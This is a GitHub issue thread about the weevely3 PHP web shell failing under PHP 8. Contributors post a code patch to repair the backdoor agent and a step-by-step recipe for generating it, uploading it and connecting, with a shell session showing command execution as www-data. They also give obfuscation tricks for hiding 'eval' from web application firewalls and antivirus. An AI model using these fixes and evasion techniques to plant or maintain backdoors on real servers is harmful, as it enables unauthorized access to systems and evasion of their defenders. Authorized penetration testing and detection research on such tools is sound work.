### ISSUE TITLE
PHP8 - The remote script execution triggers an error 500, check script and payload integrity

### ISSUE THREAD

**Issue by dvanmosselbeen** [epinna/weevely3#151]
Hi there,

After generating the PHP backdoor, uploading it and then connecting to it; I get the following non-blocking error message when the shell connect:

> The remote script execution triggers an error 500, check script and payload integrity

 However, it seems to work as expected. Tried several times and this error still pop up. Following some course online and saw other people have that same error. So I was thinking this is maybe a little bug.

Using version 4.0.1-1 from the latest and up to date Kali distribution.

Kind regards & thanks for this sweet tool

**Comment by wyb-777** [comment]
I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.

**Comment by epinna** [comment]
I confirm that PHP 8 removed `create_function`, breaking the PHP agent.

**Comment by Ghazavizade** [comment]
Hi there
I try it on last version of kali and php 7.3 but I still have this problem  but fortunately the shell completely works fine,problem is that this error is so annoying
Why this happenes exactly ? 
is there any quick fix or complete fix for this issue?

**Comment by LachlanArthur** [comment]
To generate an agent that works with PHP 8+:

Run the generate command with the flag `-obfuscator cleartext1_php` to disable the agent obfuscation (this is the only place that `create_function` is used).

Change a line in the agent to swap curly braces to square ones:

```diff
  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...
```

**Comment by 0bskure** [comment]
> I confirm that PHP 8 removed `create_function`, breaking the PHP agent.

[call_user_func still exists](https://3v4l.org/RKoIa) and works generally the same as create_function did

on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants

example with eval

`<?php
// this should return 'eval' on most php versions, 

$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
`


 there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names

**Comment by epinna** [comment]
The purpose of `create_function` was to execute in-memory PHP code from a dynamic string without leaving visible `eval()`s in the code. From a quick glance, it does not seem is possible to do the same with `call_user_func`.

**Comment by archidote** [comment]
I got the same error as you all. :/

**Comment by archidote** [comment]
Hello @nickylivardo, 

Thank's for you answer ! it succefully works ! 

Below, it's a step by step tutorial :

`weevely generate -obfuscator cleartext1_php 123 payload.php`

`nano payload.php `

```
  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

```

```
weevely http://localhost/file.php 123
```
``` 
[+] weevely 4.0.1

[+] Target:     www-data@kali:/var/www/html
[+] Session:    /home/kali/.weevely/sessions/localhost/file_0.session
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@kali:/var/www/html $ 

```

++

Archidote

**Comment by PawelklosPL** [comment]
@archidote @nickylivardo, thx for the answer. 
For future generations:

This problem still exists in
Weevely: 4.0.1 
PHP Version: 8.2.2
System: Kali linux

**Comment by ZanyMonk** [comment]
The `obfpost_php.tpl` template is pretty easy to fix, as shown above.

But I feel like there is no alternative to the now defunct `create_function` : the only alternative would be `eval`, but the purpose of this obfuscator is to hide the `eval` call to an eventual WAF/AV, calling it right away makes it useless IMHO.

We cannot call it from a string (ie. `$f = "ev"."al"; $f("...");`) because `eval` is a keyword, not a function.

Anyone have an idea to save this obfuscator from obsolescence ?

**Comment by aatif007** [comment]
thx for the answer.
For future generations:

This problem still exists in
Weevely: 4.0.1
PHP Version: 8.2.2
System: Kali linux


![2024-10-16 14_07_38-Kali Machine  Running  - Oracle VirtualBox](https://github.com/user-attachments/assets/5179c1c3-8985-4d5a-9ce1-88e68a21ee86)
![2024-10-16 14_08_10-Kali Machine  Running  - Oracle VirtualBox](https://github.com/user-attachments/assets/7a56bfb0-ecad-4370-92c6-fb4e0b62b074)
